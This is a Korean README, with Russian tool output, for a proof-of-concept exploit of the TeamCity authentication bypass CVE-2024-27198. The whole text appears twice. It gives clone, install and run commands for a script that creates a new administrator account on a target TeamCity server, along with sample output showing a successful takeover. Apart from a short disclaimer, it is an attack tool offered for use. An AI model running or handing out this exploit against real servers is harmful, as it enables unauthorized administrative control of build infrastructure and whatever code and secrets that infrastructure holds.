
는 TeamCity 서버의 취약점(CVE-2024-27198)을 대상으로 하는 PoC 도구입니다
GenTeamCityExploit은 TeamCity 서버의 취약점(CVE-2024-27198)을 대상으로 하는 PoC 도구입니다. 인증 우회 결함을 악용하여 TeamCity 버전을 식별하고 새 관리자 사용자를 생성할 수 있습니다.
pip install requests urllib3
git clone https://github.com/geniuszly/CVE-2024-27198
cd CVE-2024-27198
python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
-t, --target: 대상 TeamCity 서버의 URL입니다.-u, --username: 새 관리자 사용자의 사용자 이름입니다.-p, --password: 새 관리자 사용자의 비밀번호입니다.python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
서버가 취약하지 않거나 버전을 찾을 수 없는 경우:
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
서버에 연결하는 중 오류가 발생한 경우:
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
이 도구는 교육 목적으로만 제공되며 소유자의 명시적 허가 없이 어떤 시스템에도 사용해서는 안 됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다.
GenTeamCityExploit은 TeamCity 서버의 취약점(CVE-2024-27198)을 대상으로 하는 PoC 도구입니다. 인증 우회 취약점을 악용하여 TeamCity 버전을 식별하고 새 관리자를 생성할 수 있습니다.
pip install requests urllib3
git clone https://github.com/geniuszly/CVE-2024-27198
cd CVE-2024-27198
python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
-t, --target: 대상 TeamCity 서버의 URL입니다.-u, --username: 새 관리자의 사용자 이름입니다.-p, --password: 새 관리자의 비밀번호입니다.python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
서버가 취약하지 않거나 버전을 찾을 수 없는 경우:
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
서버 연결 중 오류가 발생한 경우:
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
이 도구는 교육 목적으로만 제공되며 소유자의 명시적 허가 없이 어떤 시스템에도 사용해서는 안 됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다.